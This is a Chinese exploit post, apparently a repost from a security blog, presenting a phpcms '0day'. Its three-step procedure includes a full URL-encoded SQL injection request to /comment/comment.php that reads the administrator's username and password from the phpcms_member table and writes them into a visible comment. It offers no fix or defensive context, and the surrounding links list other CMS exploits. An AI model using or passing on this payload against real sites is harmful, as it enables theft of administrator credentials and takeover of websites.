【Oday】phpcms 0day 一枚

2021年4月3日19:09:25评论93 views字数 413阅读1分22秒阅读模式

1、找到任意一篇文章发表评论并得到评论ID

2、提交/comment/comment.php?field=content%3D(select+concat(username%2C0x3a%2Cpassword)+from+phpcms_member+where+groupid%3D1+limit+1)+where+commentid%3D1%23&action=vote 红色替换为评论ID

3、重新查看评论

漏洞成因很简单，利用方法也不止这一种，有兴趣的同学可以研究下。

文章来源于lcx.cc:【Oday】phpcms 0day 一枚

相关推荐: 【VB】VB Clipboard 系统剪贴板操作函数详解

VB Clipboard 系统剪贴板操作函数详解，VB Clipboard 系统剪贴板操作详解，VB Clipboard 系统剪贴板操作函数，VB Clipboard 剪贴板操作函数详解，VB Clipboard 剪贴板操作函数，VB Clipboar…

左青龙
微信扫一扫

右白虎
微信扫一扫

【Oday】phpcms 0day 一枚

Php安全新闻早8点（2011-11-17 星期四） - 技术文章

黑客组织与墨西哥毒贩对峙取胜被绑成员已获释

PageAdmin cms getshell 0day - 脚本漏洞

UFO造访水星视频遭网友曝光美天文学家否认

WordPress 注入检查脚本 - 脚本漏洞

行业之星自助建站系统 v0.87 漏洞 - 脚本漏洞

深山网站管理系统漏洞 - 脚本漏洞

【Php】ABCMS新闻发布系统漏洞 - 脚本漏洞

德清洁工误将艺术品当灰尘擦干净致损失80万欧元

德新型单人飞行器试飞成功

发表评论

在线咨询

微信